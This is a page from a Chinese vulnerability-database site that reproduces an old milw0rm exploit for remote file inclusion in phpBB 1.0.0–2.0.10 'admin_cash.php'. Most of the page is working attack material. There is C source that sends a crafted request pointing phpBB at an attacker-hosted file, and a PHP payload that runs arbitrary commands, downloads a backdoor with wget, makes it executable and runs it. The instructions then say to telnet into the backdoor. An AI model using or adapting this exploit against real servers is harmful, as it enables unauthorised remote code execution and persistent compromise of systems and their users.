phpBB 1.0.0/2.0.10 – ‘admin_cash.php’ Remote Code Execution
| 漏洞ID | 1054783 | 漏洞类型 | |
| 发布时间 | 2004-12-05 | 更新时间 | 2004-12-05 |
![图片[1]-phpBB 1.0.0/2.0.10 – ‘admin_cash.php’ Remote Code Execution-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-phpBB 1.0.0/2.0.10 – ‘admin_cash.php’ Remote Code Execution-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
exploit for phpBB 1.0.0 - 2.0.10
edit the b4b0.php file with the correct url to your backdoor and the correct filename for your backdoor upload it to a webserver.
gcc -o b4b0-phpbb b4b0-phpbb.c
./b4b0-phpbb <url_to_system> <phpbb_dir> <url_to_b4b0.php>
telnet <url_of_exploited_system> <port_of_back_door>
greets to b4b0
-- evilrabbi
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
void help(char *program_name);
int main(int argc, char *argv[]) {
struct sockaddr_in trg;
struct hostent *he;
int sockfd, buff;
char buffer[1024];
char *request;
if(argc != 4 ) {
help(argv[0]);
exit(0);
}
he = gethostbyname(argv[1]);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
request = (char *) malloc(1024);
trg.sin_family = AF_INET;
trg.sin_port = htons(80);
trg.sin_addr = *((struct in_addr *) he->h_addr);
memset(&(trg.sin_zero), '�', 8);
connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr));
sprintf(request,"GET http://%s/%s/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://%s?cmd=wn",argv[1],argv[2],argv[3]);
send(sockfd,request,strlen(request),0);
buff=recv(sockfd, buffer, 1024-1, 0);
buffer[buff] = '�';
printf("%s",buffer);
close(sockfd);
return 0;
}
void help(char *program_name) {
printf("b4b0-phpbb.c by evilrabbi for b4b0nn");
printf("%s hostname phpbb2_dir url_to_bad_phpn",program_name);
printf("%s www.example.com phpBB2 blah.com/b4b0.php.phpn",program_name);
}
/* Start of b4b0.php */
/*
b4b0 kickin ass again.......
System was exploited telnet to the port you have your backdoor set to listen on.
<?
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
system("cd /tmp; wget url_to_backdoor;chmod +x backdoor_name;./backdoor_name"); // EDIT THIS INFO!!!!!!!!!!!!!
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>
*/
// milw0rm.com [2004-12-05]相关推荐: ID Software Quake 3 – ‘SMURF’ Denial of Service
ID Software Quake 3 – ‘SMURF’ Denial of Service 漏洞ID 1053544 漏洞类型 发布时间 2001-07-17 更新时间 2001-07-17 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Wind…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666